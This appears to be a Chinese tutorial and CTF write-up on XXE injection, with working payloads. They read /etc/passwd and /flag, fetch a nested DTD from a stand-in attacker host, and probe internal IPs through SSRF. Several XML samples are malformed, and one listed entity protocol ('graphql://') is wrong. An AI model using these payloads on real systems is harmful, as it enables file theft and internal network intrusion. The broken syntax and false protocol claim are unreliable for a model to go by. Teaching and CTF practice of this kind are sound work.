1.什么是XXE?
XML External Entity(XXE)攻击是一种利用 XML 处理器的漏洞,通过引入恶意的外部实体来攻击应用程序的安全性。这种攻击通常发生在对用户提供的 XML 数据进行解析时,攻击者利用了 XML 规范允许引用外部实体的特性。
在XXE攻击中,攻击者通常会构造带有恶意实体引用的 XML 数据,然后提交给应用程序进行解析。这些恶意实体引用可以指向本地文件系统中的文件、远程服务器上的资源,甚至是网络服务,从而导致应用程序执行不安全的操作,比如读取敏感文件、执行任意代码等。
用一句话总结就是:
XXE攻击利用XML解析器的漏洞,通过在XML数据中注入恶意实体,使服务器解析时返回敏感信息或执行攻击者指定的操作。
2.如何利用XXE?
当应用程序对 XML 数据执行解析时,如果未正确配置和处理外部实体引用,就可能存在 XML 实体注入(XXE)漏洞。这种漏洞可以被恶意攻击者利用来执行各种攻击,包括读取敏感文件、执行远程请求等。
下面是一个简单的例子来说明 XXE 漏洞:
假设有一个简单的 XML 文件 example.xml,内容如下:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE example [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><content>&xxe;</content> </root>
在这个例子中,定义了一个叫做xxe
的外部实体,它使用 SYSTEM
声明引用了一个本地文件 /etc/passwd
。然后在 XML 内容中,我们引用了这个外部实体来填充 <content>
元素。
假设应用程序在接收到这个 XML 文件时,未对外部实体进行适当的限制和过滤,那么在解析这个 XML 文件时就会触发 XXE 漏洞。攻击者可以通过构造包含恶意实体引用的 XML 数据,来读取或者执行系统中的敏感文件,比如 /etc/passw。
3.XML文档
● XML文档必须有根元素
● XML文档必须有关闭标签
● XML标签对大小写敏感
● XML元素必须被正确的嵌套
● XML属性必须加引号
也就是必须满足上面的格式xml文档的内容才会被识别和解析,那么必定会有一个评判的标准,那也就是DTD(document type definition)自动校准,可以是一个独立的文件,也可以在xml文件里面去声明。
DTD(内部的引用):
< !DOCTYPE TranInfo[
<! ELEMENT TranInfo(CdtrInf, DbtrInf,Amt)>
<! ELEMENT CdtrInf(Id,Nm)>
<! ELEMENT DbtrInf(Id, Nm)>
]>
XML文件:
<? xml version="1.0" encoding="UTF-8"?>
<TranInfo>
<CdtrInf>
<Id>6226097558881666</Id>
</CdtrInf>
<Nm>小白</Nm>
<DbtrInf>
<Id>6222083803003983</Id>
<Nm>小黑</Nm>
</DbtrInf>
<Amt>1000</Amt>
</TranInfo>
有没有发现上面的DTD与下面的XML一一对应的。
外部的引用:
<? xml version="1.0" encoding="UTF-8"?>
<! DOCTYPE name[
!ELEMENT name ANY >
!ENTITY xxe SYSTEM "file:///D:/test/test.dtd" >
]>
<people>
<name>xiaohei</name>
<area>&xxe ;< /area>
</ people>
从这里就会涉及一个外部实体的引用。
外部实体引用协议
常见的使用方式:
1.file:///etc/passwd
2.php://filter/read=convert.base64-encode/resource=index.php
3.http:/www.baidu.com/evil.dtd
4.graphql://api.example.com/graphql
总之:一般完整的XML文件内容:
<!-- 第一部分:XML声明部分 -- >
<? xml version="1.0"?>
<!-- 第二部分:文档类型定义 DTD -- >
<! DOCTYPE note[
<!-- 外部实体声明 -- >
! ENTITY entity-name SYSTEM "URI/URL">
1>
<!-- 第三部分:文档元素 -- >
<note>
<to>Dave</to>
<from>GiGi</from>
<head>Reminder</head>
<body>fish together</body>
</note>
4.漏洞演示
我们已经知道了XML文档一般长什么样,其实最重要的就是外部实体的引用:file:///D:/test/test.dtd
这里面可能会是一个http请求,很可能会导致漏洞出现。
常见的危害就是任意文件读取,系统命令执行,内网端口探测等
其实还有一个漏洞XXE注入比较苟:
层层嵌套
那就是我在外部引用DTD没啥问题,但是这个DTD在里面又进行了一次外部实体引用
根据SinHub大佬的说法:
xxe.xml
<? xml version="1.0"?>
<! DOCTYPE a SYSTEM "http://evil3z7.com/evil.dtd">
<c>&b ;< /c>
evil.dtd
<! ENTITY b SYSTEM "file:///etc/passwd">
上面进行了双重引用\
实战演练:
<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$ctfshow = $creds->ctfshow;
echo $ctfshow;
}
highlight_file(__FILE__);
这里就直接bp抓包给一手:
<?xml version="1.0"?>
<!DOCTYPE payload [
<!ELEMENT payload ANY>
<!ENTITY xxe SYSTEM "file:///flag">
]>
<creds>
<ctfshow>&xxe;</ctfshow>
</creds>
直接拿下。
这里还有一道特别精彩的题目:来自https://www.cnblogs.com/upfine/p/16570120.html
首先:出现一个界面
二话不说直接抓包给一手:
<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM "file:///flag">
]>
<user><username>&file;</username><password>1</password>
</user>
发现没有用,那就换成其他命令:
包含:/etc/hosts、/proc/net/arp、proc/net/fib_trie等,最终在proc/net/fib_trie发现一个新的ip:10.244.80.202,结果如下:
<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM "file:etc/hosts">
]>
<user>
<username>&file;</username>
<password>1</password>
</user>
这里获得一个新的地址,尝试下进行连接结果如下:
<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM "http://10.244.80.202/">
]>
<user>
<username>&file;</username>
<password>1</password>
</user>
发现链接不上,接下来那就尝试同网段下面的不同地址。
爆破一手
直接拿下。
希望文章能够帮助到大家,谢谢!